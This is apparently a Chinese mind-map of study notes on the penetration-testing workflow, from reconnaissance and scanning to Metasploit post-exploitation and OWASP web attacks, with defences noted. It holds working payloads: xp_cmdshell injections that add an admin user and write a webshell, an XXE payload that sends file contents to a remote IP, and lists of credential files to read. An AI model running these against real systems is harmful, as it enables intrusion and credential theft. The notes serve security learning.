首页  思维导图  详情

网络安全-渗透测试流程

2023-09-30 10:46:35   0  举报





AI智能生成

为你推荐

查看更多



渗透测试流程主要包括：信息收集、威胁建模、漏洞分析、渗透攻击和结果分析五个阶段。首先，通过各种手段收集目标系统的信息，包括网络结构、运行服务、系统版本等。然后，根据收集到的信息进行威胁建模，确定可能的攻击路径和攻击方式。接着，对可能存在的安全漏洞进行分析，寻找可利用的漏洞。在确认漏洞存在后，进行渗透攻击，尝试利用漏洞获取系统权限。最后，对渗透测试的结果进行分析，评估系统的安全性，并提出改进建议。整个过程需要遵循合规性原则，避免对目标系统造成不必要的损害。

作者其他创作

大纲/内容

域名

内外网

确定范围

时间

可否上传

可否提权

确定规则

Web应用

业务逻辑

人员权限管理

确定需求

代码

数据库

数据备份

明确目标

DNS 传送漏洞

https://www.tianyancha.com

http://www.beianbeian.com

https://icp.aizhan.com

http://cha.fute.com/index

备案号查询

https://myssl.com/ssl.html

https://www.chinassl.net/ssltools/ssl-checker.html

SSL查询

JDK8

环境变量

字符串搜索

AndroidKiller

APP提取

手机抓包

微信公众号提取

Demon

DirBuster

DNSReconcile

Layer子域名挖掘机

暴力破解常用工具

暴力破解

www.dnsdb.io（收费）

DNS历史记录解析

# 从标题中搜索北京

title="beijing"

# 从Http头中搜索test

header="test"

#从HTML正文中搜索test

body="test"

#搜索根域名带有test.com的网站

domain="test.com"

#查找备案号为京ICP证xxxx号的网站

icp="京ICP证xxxx号"

#查找对应3306端口的资产

port="3306"

#从ip中搜索包含1.1.1.1的网站

ip="1.1.1.1"

#查询IP为“220.181.111.1”的C网段资产

ip="220.181.111.1/24"

#查询服务器状态码为200的资产

status_code="200"

#搜索指定国家的资产（编码）

country="CN"

#搜索指定操作系统的资产

os="centos"

#搜索证书序列号为xxxxxxx的资产（10进制）

cert="xxxxxxx"

#时间范围段搜索

after="2017" && before="2017-10-01"

#指定中间件搜索

server="nginx"

# 常用基础查询语句

https://fofa.so/\t\t\t#Fofa

http://tool.chinaz.com/\t\t#钟馗之眼

https://www.zoomeye.org/\t#站长之家

在线网站查询

下载地址：https://github.com/Threezh1/JSFinder

用法： python3 JSFinder.py -u http://www.163.com

Jsfinder（Kali下的.py文件）

https://ti.360.cn #360

https://s.threatbook.cn/ #微步云沙箱

威胁情报

site # 可以限制你搜索范围的域名.

filetype # 搜索文件的后缀或者扩展名

intitle # 限制你搜索的网页标题.

allintitle # 搜索所有关键字构成标题的网页. 但是推荐不要使用

link# 可以得到一个所有包含了某个指定URL的页面列表

Google Hack

C段收集

站长之家

天眼查

证书序列号获取企业域名与ip

子域名及ip获取

https://searchcode.com/

https://github.com/

https://gitee.com/

源码搜索

web源码泄露

https://www.lingfengyun.com/ #凌风云

http://www.pansou.com/ #盘搜

网盘搜索

https://www.instantcheckmate.com/

http://www.uneihan.com/

https://www.uedbox.com/post/7860/ #社工库搭建

社工库

百度等搜索引擎搜索

github等第三方托管平台

手工

https://github.com/laramies/theHarvester #下载地址

./theHarvester.py -d 域名 -1 1000 -b all #使用方法

The Harvester

工具

邮箱信息收集

http://www.anquan.us/

http://wooyun.2xss.cc/

wooyun

https://www.butian.net/

补天

https://src.edu-info.edu.cn/login/

教育行业漏洞报告平台

https://www.bugbank.cn/

漏洞银行

http://www.cnvd.org.cn/ #CNVD国家信息安全漏洞平台

CNVD

历史漏洞收集

https://whois.aliyun.com/ #阿里whois

http://whois.chinaz.com/ #站长之家whois

https://who.is/ #国外whois

whois查询

敏感信息收集

御剑WEB指纹识别系统 #独立工具

whatweb #Kali集成

Wapplyzer #chrome拓展

工具识别（稳定）

http://www.yunsee.cn/info.html

# 注册需要提交三个指纹

云悉指纹识别

在线识别（库较大，但是不稳定）

指纹识别

Usage：wafw00f <domain>

WAF（Kali集成）

http://ping.chinaz.com/

http://ping.aizhan.com/

多地ping确认

DNSDB #https://dnsdb.io/zh-cn/

微步在线 #https://x.threatbook.cn/

在线网站查找 #https://tools.ipip.net/cdn.php

https://tools.ipip.net/cdn.php

DNS历史解析记录

title

cert

Fofa

https://www.cnblogs.com/qiudabai/p/9763739.html

绕过CDN

如果目标网站存在phpinfo泄露等，可以在phpinfo中的SERVER_ADDR或_SERVER[“SERVER_ADDR”]找到真实ip

phpinfo.php

CDN识别

指纹 / WAF / CDN 识别

https://www.hackerone.com/ #国际漏洞提交平台

http://www.cnvd.org.cn/ #CNVD国家信息安全漏洞平台

https://www.bugbank.cn/ #漏洞银行

https://www.butian.net/ #360补天

SRC众测平台

https://www.seebug.org/ #知道创宇Seebug漏洞平台

http://www.bugscan.net/source/template/vulns/ #为数不多的漏洞管理插件收集平台

国内漏洞平台

可能用到的网站

信息整理

信息收集

# 端口开放

open

# 端口关闭

closed

# 端口被防火墙屏蔽，无法确定状态

filtered

# 端口没有被屏蔽，但是否开放需要进一步确认

unfiltered

# 端口是开放的或被屏蔽

open|filtered

# 端口是关闭的或被屏蔽

closed|filtered

端口状态

TCP SYN scanning

TCP connect scanning

TCP ACK scanning

TCP FIN/Xmas/NULL scanning

UDP scanning

其他方式

端口扫描探测方式

# 只进行主机发现，不进行端口扫描

-sn

# TCP方式进行端口扫描

-sS

# UDP方式进行端口扫描

-sU

# 指定版本探测

-sV

# 探测系统类型版本号

-O

# 绕过ping扫描，对方开启防火墙时使用

-Pn

# 指定端口扫描

-p

NMAP核心命令

NMAP

端口扫描

# 域名

www.test.com

# 单个ip

10.0.0.1

#多个ip，逗号隔开

# 多个连续ip

10.0.0.1-10.0.0.70

# 网段

10.0.0.*

目标格式

# 采用常规Ping和若干TCP最常用端口来发现主机，速度快，范围广

常规探测

# 采用连接目标主机的大范围常用端口来发现主机，特点是探测准确度高，扫描时间长，适用于有防火墙的环境

深度探测

自定义端口探测

主机存活探测选项

扫描常见的5000个端口，扫描速度与扫描准确性较好

标准端口扫描

扫描常见的1024个端口，扫描速度快

快速端口扫描

指定端口扫描

扫描策略

SYN

FIN

ACK

NULL

UDP

常用服务改变默认端口的情况下，扫描发现目标主机开放的服务

智能识别

扫描方式

端口扫描选项

天镜

https://localhost:8834/#/

net stop "Tenable Nessus"

Nessus

系统扫描

记录Session

适用于无验证码界面

自动

提示

无，不登录后端

登录方法

Appscan

# 需要登录时使用

HTTP认证

# 需要证书时使用

客户证书

# 需要隐藏本机或扫描内网

代理服务器

# 无需验证码时使用

网站登录

AWVS

Netspark

绿盟wvss

安恒明鉴

Web扫描

梆梆安全

360

爱加密

App扫描

漏洞扫描

1. search

use exploit/multi/handler #设置监听

2. use

3. show options

4. set

5. exploit

基本步骤

渗透攻击是指由攻击者或者渗透测试者利用系统、应用或服务中的安全漏洞，所进行的攻击行为。

渗透攻击 Exploit

攻击载荷是我们期望目标系统在被渗透攻击后而执行的代码

bind_tcp

reverse_tcp

攻击载荷 Payload

渗透攻击时作为攻击载荷运行的一组机器指令

溢出代码 Shellcode

在MSF中，一个模块是指MSF框架中所像用的一段软件代码组件

模块 Module

监听器是MSF中用来等待连入网络连接的组件

监听器 Listener

名词解释

？#¿

search #搜索模块名和描述

use #进入模块

back #从当前环境返回

check #检测

background\t#后台运行会话

sessions -i\t#查看所有会话

connect [options] <host> <port> #连接

kill \t#结束进程

quit \t#退出MSF

loadpath #加载一个模块的路径

load #加载一个插件

resource #运行储存一个文件中的命令

route\t#查看一个会话的路由信息

save \t#保存动作

set\t\t#给一个变量赋值

show\t#显示给所有类型的模块

setg\t#把一个赋值给全局变量

sleep #在限定的秒数内什么也不做

unload\t#卸载一个模块

unset\t#解除一个或多个变量

unsetg\t#解除一个或多个全局变量

version #显示MSF和控制台版本

常用命令

# 上传文件到Windows主机，使用-r参数可以递归上传上传目录和文件

upload <file> <destination>

# 从windows主机下载文件

download <file> <path to save>

# 在目标主机上执行exe文件

execute -f <path> [options]

# 在目标主机上执行命令提示符

execute -f cmd -c

# 显示进程

C:\\Windows\\system32>chcp 65001 #解决cmd乱码，实际为转化成英文

# 进入目标主机的cmd

shell

system #Windows最高权限

root #Linux最高权限

# 查看当前权限

getuid

# 显示系统名，操作系统，架构和语言

sysinfo

# 使用Hashdump转储所有hash值

hashdump

# 使用Credcollect转储hash值

run credcollect

portlist\t\t# 查看所有端口转发记录

portfwd flush\t# 删除所有的端口转发记录

portfwd add -l port1 -p port2 -r ip # 将目标机的port2端口转发到ip的port1端口

# 创建端口转发，这个隧道存在于meterpreter控制台之外，任何终端会话都可以使用

portfwd add -l port1 -p port2 -r ip

# 删除端口转发

portfwd delete -l <portnumber> -p <portnumber> -r <Target IP>

# 查找目标主机上的特定文件

use incognito # 加载incognito模块

list_tokens -u #显示所有有效的tokens

impersonate_token "Root-PC\\Root" # 模拟Root-PC\\Root的token

# 模拟任意用户(token操作)

incognito

webcam_list \t# 查看摄像头

webcam_snap \t# 通过摄像头拍照

webcam_stream # 通过摄像头开启视频

# 摄像头

webcam

# 执行文件

execute

timestomp C:// -h \t\t\t\t# 查看帮助

timestomp -v C://2.txt \t\t\t# 查看时间戳

timestomp C://2.txt -f C://1.txt \t# 将1.txt的时间戳复制给2.txt

# 伪造时间戳

timestomp

keyscan_start \t# 开始键盘记录

keyscan_dump \t# 导出记录数据

keyscan_stop \t# 结束键盘记录

# 键盘记录

keyscan

后期攻击使用方法

-p # 选择一个payload

-l # 载荷列表

-f # 生成的文件格式

-e # 编码方式

-i # 编码次数

-b # 在生成的程序中避免出现的值

-x # 允许我们指定一个自定义的可执行文件作为模板，也就是将木马捆绑到这个可执行文件上。

-h # 帮助

Msfvenom生成木马

MS17-010（永恒之蓝）

CVE-2020-0796 (永恒之蓝2.0)

CVE_2019_0708（3389远程桌面）

MS12-020 (DOS攻击，蓝屏，3389端口)

MS15-034 (IIS蓝屏)

MS10-018 （浏览器钓鱼）

MS10-087 （Word钓鱼）

Windows

CVE-1999-0170 （NFS 共享信息泄露漏洞）

CVE-2014-6271 （Bash Shellshock破壳）

CVE-2012-1823 (PHP CGI漏洞利用)

auxiliary/scanner/smb/smb_version

exploit/multi/samba/usermap_script

samba服务漏洞

Linux

常见漏洞

MSF

A1 注入攻击

A2 失效的身份认证

A3 敏感数据泄露

A4 XML外部实体攻击

A5 无效的访问控制

A6 安全配置错误

A7 跨站脚本攻击

A8 不安全的反序列化漏洞

A9 使用含有已知漏洞的组件

A10 日志与监控不足

OWASP TOP10（2017）

注入产生的原因是接受相关参数未经处理直接带入数据库查询操作;注入攻击属于服务端攻击，他与操作系统、数据库类型、脚本语言类型无关

注入攻击原理

注入漏洞的检测方法：单引号或and 1=1 和and 1=2

http://www.*****.com/***.asp?id=xx (ASP注入)

http://www.*****.com/***.php?id=xx (php注入)

http://www.*****.com/***.jsp?id=xx (jsp注入)

与数据库交互的相关页面

登录的地方、更新的地方、注册的地方、留言板等

把http header直接代入数据库

Http Header注入

数据参数写入到cookice参数里面

Cookie注入

可能出现注入的地方：http头、cookices、referee、user agent，post提交数据包的地方等等

如何找注入

注入原理与查找方法

数字型

字符型

'%vince%' or 1=1;

搜索型

username=('xx') or 1=1;

XX型

注入分类

地址栏可以看见参数

get

通过burp抓包

post

注入提交方式

union操作符一般与order by语句配合使用

union注入

information_schema数据库是MySQL系统自带的数据库。其中保存着关于MySQL服务器所维护的所有其他数据库的信息

information_schema注入

updatexml（）、extractvalue（）、 floor（）

基于函数报错注入（insert、update、dalete）

基于布尔型SQL盲注

vince' and sleep(x)#

基于时间型SQL盲注

基于报错型SQL盲注

盲注

跟GBK有关，%df' or 1=1

宽字节注入

注入攻击支持类型

and exists (select * from%20sysobjects)

第一步：检查是否是mssql数据库

and system_user=0

第二步:查询当前数据库系统的用户名

and 1=(select IS_SRVROLEMEMBER('sysadmin'))

第三步：检查注入点是否为sa权限

and 1=(select count(*) from master.dbo.sysobjects where name ='xp_cmdshell')

第四步：判断一下xp_cmdshell存储过程是否存在

;exec master..xp_cmdshell 'net user test test /add'

;exec master..xp_cmdshell 'net localgroup administrators test /add'

第五步:添加帐号

第六步：开3389

and 1=(SELECT IS_MEMBER('db_owner'));-- 判断当前数据库用户是否为db_owner权限

第一步：查看当前网站是否为db_owner权限

1、通过报错或baidu、google等查找

insert into black exec master..xp_cmdshell 'dir /s c:\\1.aspx'--

and (select result from black where id=1)>0--

2、通过相关语句

第二步:找出网站路径

%20;exec%20master..xp_cmdshell%20'Echo%20"<%eval%20request("chopper")%>"%20>>%20c:\\wwwtest\\iis-xxser.com--wwwroot\\sqlserver\\muma.asp'--

master..xp_cmd

;alter database testdb set RECOVERY FULL;create table test_tmp(str image);backup log testdb to disk='c:\\test1' with init;insert into test_tmp(str) values (0x3C2565786375746528726571756573742822636D64222929253E);backup log testdb to disk='C:\\wwwtest\\iis-xxser.com--wwwroot\\yjh.asp';alter database testdb set RECOVERY simple

差异备份

第三步：写入一句话木马获取webshell

dbowner

and db_name()=0--

第一步：获取当前网站数据库名称

第二步：获取mssql所有数据库名和路径

and 0<>(select top 1 name from testdb.dbo.sysobjects where xtype=0x7500 and name not in (select top 2 name from testdb.dbo.sysobjects where xtype=0x7500))--

第三步：获取当前数据库所有表名

having 1=1--

group by admin.id having 1=1--

第四步:爆表名及字段名

第五步:获取字段内容

public

MySQL 4版本数据库由于存在着字符转义与不支持字句查询的情况，因此在注入攻击上存在着很大的局限性，只能采用类似Access的方法进行查询猜解。首先，利用order by获得当前表的字段数，再使用union select联合查询来获取想要的数据库信息。使用union select联合查询数据库时，由于不知道数据库中的表名与字段名，因此只能像Access一样直接用常见表名和字段名进行猜测判断。

MySQL 5版本由于information_schema库的存在，注入攻击相对来说方便了许多通过load_file()函数来读取脚本代码或系统敏感文件内容，进行漏洞分析或直接获取数据库连接账号、密码。通过dumpfile/outfile函数导出获取WebShell。

mysql4与5区别

数据库最高权限用户是root 密码保存在mysql数据库的user表中，密码是采用mysql5特有的加密，通过cmd5网站进行解密或通过cain等这类专业可以对mysql hash破解.所以对数据库做安全的时候无论如何不能给网站root 权限，一定要给一个普通用户权限。

mysql用户名密码存储位置

检查注入点' 与and 1=1 and 1=2

需要知道远程目录

需要mysql root权限

需要远程目录有写权限

需要数据库开启secure_file_priv 相当于secure_file_priv的值为空，不为空不充许写入webshell （默认不开启，需要修改mysql.ini配置文件）

对服务器文件进行读写操作(前提条件)

常见WINDOWS下配置文件:c:/windows/php.ini //php配置信息c:/windows/my.ini //MYSQL配置文件，记录管理员登陆过的MYSQL用户名和密码c:\\mysql\\data\\mysql\\user.MYD //存储了mysql.user表中的数据库连接密码c:\\windows\\system32\\inetsrv\\MetaBase.xml 查看IIS的虚拟主机配置d:\\APACHE\\Apache2\\conf\\httpd.confc:\\windows\epair\\sam //存储了WINDOWS系统初次安装的密码

LUNIX/UNIX 下:/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件/usr/local/apache2/conf/httpd.conf/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置/usr/local/app/php5/lib/php.ini //PHP相关设置/etc/sysconfig/iptables //从中得到防火墙规则策略/etc/httpd/conf/httpd.conf // apache配置文件/etc/rsyncd.conf //同步程序配置文件/etc/my.cnf //mysql的配置文件/etc/redhat-release //系统版本/usr/local/resin-3.0.22/conf/resin.conf 针对3.0.22的RESIN配置文件查看

获取web路径的方法

服务器读取文件

写webshell获取权限

mysql注入语句

指定参数post注入 sqlmap.py -r post.txt -p 注入参数

-r

get注入

-u

–-level=LEVEL

--risk=RISK

ERBOSE信息级别: 0-6 （缺省1），其值具体含义：“0”只显示python错误以及严重的信息；1同时显示基本信息和警告信息（默认）；“2”同时显示debug信息；“3”同时显示注入的payload；“4”同时显示HTTP请求；“5”同时显示HTTP响应头；“6”同时显示HTTP响应页面；如果想看到sqlmap发送的测试payload最好的等级就是3。

-v

-p 后面接参数，针对单个参数注入

线程数，如果你想让sqlmap跑的更快，可以更改这个线程数的值，默认值为10

-threads

智能判断测试

-batch-smart

模拟测试手机环境站点

--mobile

批量注入

-m

--dbs //默认情况系sqlmap会自动的探测web应用后端的数据库类型：MySQL、Oracle、PostgreSQL、MicrosoftSQL Server、Microsoft Access、SQLite、Firebird、Sybase、SAPMaxDB、DB2--current-user：大多数数据库中可检测到数据库管理系统当前用户--current-db：当前连接数据库名--is-dba：判断当前的用户是否为管理--users：列出数据库所有所有用户

注入获取数据命令

--tables -D 数据库名

获取表名

--columns -T user -D abc

字段名

数据内容

--file-read /etc/password

读文件内容

--os-shell

系统交互的shell

--file-write "c:/3.txt” --file-dest “C:/phpStudy/WWW/3.php” -v1 /*将/software/nc.exe文件上传到C:/WINDOWS/Temp下*/

写webshell

--tamper ""

sqlmap过waf

sqlmap

涵数过滤

直接下载相关防范注入文件，通过incloud包含放在网站配置文件里面

PDO预处理：http://www.php.cn/course/868.html

注入防御

mssql数据库

and exists(select * from users)

猜解数据库表名

and exists(select password from administrator)

猜解数据库表名里面的字段

and (select top 1 len(user_name) from administrator)>1

猜解字段内容

order by

union select

SQL注入中的高级查询

偏移注入

跨库查询

access数据库

cookie注入：当我们打开get或post页面的时候，发现有注入防范，可以把get或post参数写入到cookie里面进行测试注入，有的时候程序未对cookie注入进行防范（注：前提是接受用户参数的地方是request并未对cookie进入防范）

伪静态与cookie注入

Sql注入

什么是XSS

XSS漏洞产生必须要满足有输入与输出

XSS漏洞出现的原因

xss概念及原理

反射型XSS

储存型XSS

DOM XSS

XSS分类

HTML context

Attribute Context

URL Context

Style Context

Script Context

XSS可能存在的地方

最重要的是考虑那里有输入，输入的数据在什么地方输出

APPscan、AWVS、Burpsuite 等

Burpsuite、firefox(hackbar)、XSSER XSSF等

半自动化工具

XSS测试方法

当`协议`、`主机(主域名，子域名)`、`端口`中的任意一个不相同时，称为不同域。我们把不同的域之间请求数据的操作，成为跨域操作。

什么是跨域

为了安全考虑，所有浏览器都约定了“同源策略”，同源策略禁止页面加载或执行与自身来源不同的域的任何脚本既不同域之间不能使用JS进行操作。比如：x.com域名下的js不能操作y.com域名下的对象

同源策略

<img src="..."> //图片

不受同源策略限止

后台设置好Access-Control-Allow-Origin，设置为*，既允许所有人访问

同源策略修改

前端限制绕过

大小写混合

拼凑绕过

编码

注释干扰后台绕过

htmlspecialchars()函数的语法

& (和号)成为 &

" (双引号)成为 "

’ (单引号)成为'

< (小于)成为 <

>(大于)成为 >

htmlspecialchars()函数的作用

# 可用的quotestyle类型

ENT_QUOTES \t\t# 编码双引号和单引号

ENT_NOQUOTES \t# 不编码任何引号

q' onclick='alert(111)' #绕过方法

htmlspecialchars()函数配置参数

htmlspecialchars()函数

XSS绕过

根据业务需求进行过滤，比如输出点要求输入手机号，则只允许输入手机号格式的数字。

过滤

所有输出到前端的数据都根据输出点进行转义，比如输出到html中进行html实体转义，输入到JS里面的进行JS转义(\\\\)

转义

总体思路：对输入进行过滤，对输出进行编码

XSS的防范

XSS（跨站脚本攻击）

XML外部实体注入(Xml eXternal Entity)

什么是XXE

libxml_disable_entity_loader(FALSE);

XXE产生原因

XXE的概念及原理

XML声明

DTD文档类型定义

文档元素

XML的文档结构

元素是 XML 以及 HTML 文档的主要构建模块，元素可包含文本、其他元素或者是空的。

空的 HTML 元素的例子是 hr、br 以及 img

元素

属性可提供有关元素的额外信息

属性

实体是用来定义普通文本的变量。实体引用是对实体的引用

实体

PCDATA 的意思是被解析的字符数据（parsed character data）

PCDATA 是会被解析器解析的文本。这些文本将被解析器检查实体以及标记

PCDATA

CDATA 的意思是字符数据（character data）

CDATA 是不会被解析器解析的文本

CDATA

XML文档的构建模块

定义 XML 文档的合法构建模块

作用

<!DOCTYPE 根元素 [元素声明]>

内部声明

<!DOCTYPE 根元素 SYSTEM "文件名">

外部引用

DTD(文档类型定义)

DTD实体是用于定义引用普通文本或特殊字符的快捷方式的变量

<!ENTITY 实体名 "实体内容">

一般实体

<!ENTITY % 实体名 "实体内容">

参数实体

实体的分类

%实体名

引用实体的方式

<!ENTITY 实体名称 "实体的值">

<!ENTITY eviltest "eviltest"> # 范例

# 完整示例<?xml version="1.0"?><!DOCTYPE test [<!ENTITY writer "Bill Gates"><!ENTITY copyright "Copyright W3School.com.cn">]>

内部实体声明

<!ENTITY 实体名称 SYSTEM "URI">

# 完整示例<?xml version="1.0"?><!DOCTYPE test [<!ENTITY writer SYSTEM "http://www.w3school.com.cn/dtd/entities.dtd"><!ENTITY copyright SYSTEM "http://www.w3school.com.cn/dtd/entities.dtd">]>

外部实体声明

DTD实体

XML简单介绍

抓包看accept头是否接受xml

抓包修改数据类型，把json改成xml来传输数据

如何找xxe漏洞

<?xml version = "1.0"?> <!DOCTYPE note [ <!ENTITY hacker SYSTEM "file:///c:/windows/win.ini" > ]> <name>&hacker;</name>

有回显

<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///c:/1.txt"><!ENTITY % int "<!ENTITY % send SYSTEM 'http://192.168.0.105:8080?p=%file;'>">

建立*.dtd

<!DOCTYPE convert [ <!ENTITY % remote SYSTEM "http://ip/test.dtd">%remote;%int;%send;]>

xml调用

无回显

XXE攻击

1、升级php版本

2、程序员修改代码

<!DOCTYPE、<!ENTITY SYSTEM、PUBLIC

3、过滤关键词

防范方法

XXE（外部实体注入）

`Cross-site request forgery`简称CSRF。CSRF攻击是建立会话Session之上的攻击，在CSRF的攻击场景中攻击者会伪造一个请求（这个请求一般是一个链接），然后欺骗目标用户进行点击，用户一旦点击了这个请求，整个攻击就完成了。同时CSRF攻击也被称为 `one-click attack` 或者 `session riding`。

概念

程序员开发的时候，未对相关页面进行token和REFERER判断，造成攻击者可构造自己的URL地址欺骗目标用户进行点击

原理

用户打开浏览器，访问受信任网站A，输入用户名和密码请求登录网站A；

在用户信息通过验证后，网站A产生Cookie信息并返回给浏览器，此时用户登录网站A成功，可以正常发送请求到网站A；

用户未退出网站A之前，在同一浏览器中，打开一个TAB页访问网站B；

网站B接收到用户请求后，返回一些攻击性代码，并发出一个请求要求访问第三方站点A；

浏览器在接收到这些攻击性代码后，根据网站B的请求，在用户不知情的情况下携带Cookie信息，向网站A发出请求。网站A并不知道该请求其实是由B发起的，所以会根据用户C的Cookie信息以C的权限处理该请求，导致来自网站B的恶意代码被执行。

攻击步骤

CSRF概念及原理

CSRF站内类型的漏洞在一定程度上是由于程序员滥用$_REQUEST类变量造成的。

站内

站外类型的漏洞本质上就是传统意义上的外部提交数据问题

站外

CSRF攻击分类

抓取一个正常请求的数据包，去掉Referer字段后再重新提交，如果该提交还有效，那么基本上可以确定存在CSRF漏洞。

手动检测

BurpSuite

CSRFTester

CSRF Request Builder

工具检测

CSRF漏洞检测方式

扫描器

修改密码的地方

添加用户的地方

数据库备份的地方

数据交易、支付等

CSRF一般与XSS结合使用

CSRF漏洞挖掘

验证Rerferer字段

添加token并验证

在Http头中自定义属性并验证

严格区分Post与Get的数据请求，建议不要用Get请求来做会话保持

使用验证码或原密码确认

服务端防御

安全设备如H3C公司的IPS产品

客户端防御

CSRF攻击防御

CSRF（跨站请求伪造）

SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下，SSRF是要目标网站的内部系统。

SSRF漏洞就是通过篡改获取资源的请求发送给服务器，但是服务器并没有检测这个请求是否合法的，然后服务器以他的身份来访问其他服务器的资源

SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能，且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容，加载指定地址的图片，文档，等

SSRF概念及原理

可以对外网服务器所在的内网进行端口就扫描，获取一些服务的banner信息

攻击运行在内网或本地的应用程序

对内网的web应用进行指纹识别，通过访问默认文件实现

攻击内外网的web应用，主要是get参数就可以实现的攻击（如：strets2，sqli等）

利用`File`协议读取本地文件

SSRF的用途

分享：通过URL地址分享网页内容

转码服务

在线翻译

图片加载与下载：通过URL地址加载或下载图片

图片、文章收藏功能

未公开的API实现以及其他调用URL的功能

WEB功能

share=

wap=

url=

link=

src=

source=

target=

3g=

display=

sourceURl=

imageURL=

domain=

URL关键字

SSRF的漏洞挖掘

八进制

十六进制

十进制

十进制整数格式

16进制整数格式

更改IP地址写法

超链接

http://www.oldboyedu.com@192.168.0.1/

利用解析URL所出现的问题

SSRF的绕过方法

file_get_contents

fsockopen

curl_exec

可能导致SSRF的后端代码函数

过滤10.0.0.0/8 、172.16.0.0/12、192.168.0.0/16、localhost私有地址、IPv6地址

过滤file:///、dict://、gopher://、ftp:// http:// https:// php:///危险schema

白名单过滤

对返回的内容进行识别

SSRF的防范方法

SSRF（服务端请求伪造）

网站对用户查看或下载的文件没有做限制，则恶意用户就能够查看或下载任意敏感文件，这就是文件查看与下载漏洞。

download.php?path

down.php?file

data.php?file

一般链接形式

&Src=

&Inputfile=

&Filepath=&Path=

包含参数

URL

2. 下载各种.log文件，从中寻找一些后台地址，文件上传点之类的地方。

3. 下载web业务文件进行白盒审计，利用漏洞进一步攻入服务器。

利用思路

/root/.ssh/authorized_keys

/root/.ssh/id_rsa

/root/.ssh/id_ras.keystore

/root/.ssh/known_hosts //记录每个访问计算机用户的公钥

/etc/passwd

/etc/shadow //用户密码文件

/etc/my.cnf //mysql配置文件

/etc/httpd/conf/httpd.conf //apache配置文件

/root/.bash_history //用户历史命令记录文件

/root/.mysql_history //mysql历史命令记录文件

/proc/mounts //记录系统挂载设备

/porc/config.gz //内核配置文件

/var/lib/mlocate/mlocate.db //全文件路径

/porc/self/cmdline //当前进程的cmdline参数

c:/boot.ini //查看系统版本

c:/windows/php.ini //php配置信息

c:/windows/my.ini //MYSQL配置文件，记录管理员登陆过的MYSQL用户名和密码

c:/winnt/php.ini

c:/winnt/my.ini

c:\\mysql\\data\\mysql\\user.MYD //存储了mysql.user表中的数据库连接密码

c:\\Program Files\\RhinoSoft.com\\Serv-U\\ServUDaemon.ini //存储了虚拟主机网站路径和密码

c:\\Program Files\\Serv-U\\ServUDaemon.ini

c:\\windows\\system32\\inetsrv\\MetaBase.xml 查看IIS的虚拟主机配置

c:\\windows\epair\\sam //存储了WINDOWS系统初次安装的密码

c:\\Program Files\\ Serv-U\\ServUAdmin.exe //6.0版本以前的serv-u管理员密码存储于此

c:\\Program Files\\RhinoSoft.com\\ServUDaemon.exe

C:\\Documents and Settings\\All Users\\Application Data\\Symantec\\pcAnywhere\\*.cif文件

//存储了pcAnywhere的登陆密码

c:\\Program Files\\Apache Group\\Apache\\conf\\httpd.conf 或C:\\apache\\conf\\httpd.conf //查看WINDOWS系统apache文件

c:/Resin-3.0.14/conf/resin.conf //查看jsp开发的网站 resin文件配置信息.

c:/Resin/conf/resin.conf /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机

d:\\APACHE\\Apache2\\conf\\httpd.conf

C:\\Program Files\\mysql\\my.ini

C:\\mysql\\data\\mysql\\user.MYD 存在MYSQL系统中的用户密码

常见利用文件

利用

过滤"."，使用户在url中不能回溯上级目录*

正则严格判断用户输入参数的格式

open_basedir = dir

php.ini配置open_basedir限定文件访问范围

修复

任意文件下载

后台开发时并没有对上传的文件进行安全考虑或采用了有缺陷的措施，导致攻击者可以通过一些手段绕过安全措施从而上传一些恶意文件，从而通过该恶意文件的访问来控制整个后台

BurpSuite抓包改后缀

客户端检测绕过(javascript 检测)

上传特殊可解析后缀

该文件会把当前目录下的所有文件当做脚本解析

上传.htaccess文件

$file_ext = strtolower($file_ext); //转换为小写

后缀大小写绕过

点绕过

空格绕过

::$DATA绕过

双后缀名绕过

配合解析绕过

黑名单

$file_ext = trim($file_ext) #首尾去空

$file_name = deldot($file_name) #删除文件名末尾的点

概要

每个MIME类型由两部分组成，前面是数据的大类别，后面定义具体的种类。

超文本标记语言文本 .html text/html

xml文档 .xml text/xml

普通文本 .txt text/plain

PDF文档 .pdf application/pdf

Microsoft Word文件 .word application/msword

PNG图像 .png image/png

GIF图形 .gif image/gif

AVI文件 .avi video/x-msvideo

GZIP文件 .gz application/x-gzip

TAR文件 .tar application/x-tar

常见MIME类型

MIME绕过

%00，会自动截断符号后边的内容

%00截断

BurpSuite Hex

0x00

0x0a截断

白名单

检查后缀

检查文件头

# 用于获取图像尺寸

getimagesize()

# 获取图片类型

exif_imagetype()

二次渲染

检查内容

服务端

检测/绕过的方式

分支主题

任意文件上传测试流程图（放大）

文件类型检查：强烈推荐白名单方式，结合MIME Type、后缀检查等方式（即只允许允许的文件类型进行上传）；此外对于图片的处理可以使用压缩函数或resize函数，处理图片的同时破坏其包含的HTML代码；

使用随机数改写文件名和文件路径，使得用户不能轻易访问自己上传的文件

单独设置文件服务器的域名；

防御 / 修复

任意文件上传

任意文件下载上传漏洞

开发时，未对包含的文件进行严格过滤，攻击者可构造自己的图片木马文件当作php执行

包含自身服务器的文件

本地包含

`allow_url_include = on`

`magic_quotes_gpc = off`

远程包含

分类

寻找`www.xxx.xxxx.com?page=`

`www.xxx.xxxx.com?file=`

`www.xxx.xxxx.com?filename=`

黑盒

源码中寻找以下函数

`include()`\t \t#正常包含

`include_once()`\t#不重复加载

`require()`\t#遇到错误退出

`require_once()`\t#不重复加载&遇到错误退出

白盒

快速寻找漏洞

file:// # 访问本地文件系统

http:// # 访问http / https网址

ftp:// # 访问FTP / FTPS URLS

php:// # 访问各个输入 / 输出设备

zlib:// # 压缩流

data:// # 数据（RFC2397）

sshh:// # Secure Shell2

expect:// # 处理交互式的流

glob:// # 查找匹配的文件路径模式

PHP内置协议

在功能设计上尽量不要讲文件包含函数对应的文件放给前端进行选择和操作

过滤各种../../，http://，https://，

allow_url_include=off

allow_url_fopen=off

magic_quotes_gpc=on

php.ini

白名单，仅允许包含运行指定的文件

文件包含漏洞

php配置文件中，开启了cgi.fix_pathinfo

www.xxxx.com/UploadFiles/image/1.jpg/.php

www.xxxx.com/UploadFiles/image/1.jpg%00.php

www.xxxx.com/UploadFiles/image/1.jpg/%20\\0.php

形式

